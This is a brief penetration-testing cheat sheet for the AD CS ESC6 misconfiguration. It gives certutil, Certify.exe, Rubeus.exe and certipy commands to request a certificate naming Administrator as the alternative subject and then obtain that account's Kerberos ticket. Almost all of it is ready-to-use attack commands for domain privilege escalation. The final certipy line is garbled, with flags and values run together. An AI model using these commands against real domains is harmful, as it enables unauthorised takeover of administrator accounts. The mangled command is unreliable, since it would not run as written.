ESC6
ESC6 permits the inclusion of user-defined values in subject alternative name
for any request.
Verify the permission:
certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
Windows
Request a certificate abusing ESC6
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator
Convert certificate to PFX
Get a TGT as the Administrator Account
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx
Linux
Certificate Request with an alternative UPN
bob$ certipy findreq -uusername 'user1@minions.com'com -ppassword 'password1'password1 -dc-ipca <ca_name> -target <ip> -vulnerabletemplate <template_name> -stdoutupn administrator@minions.com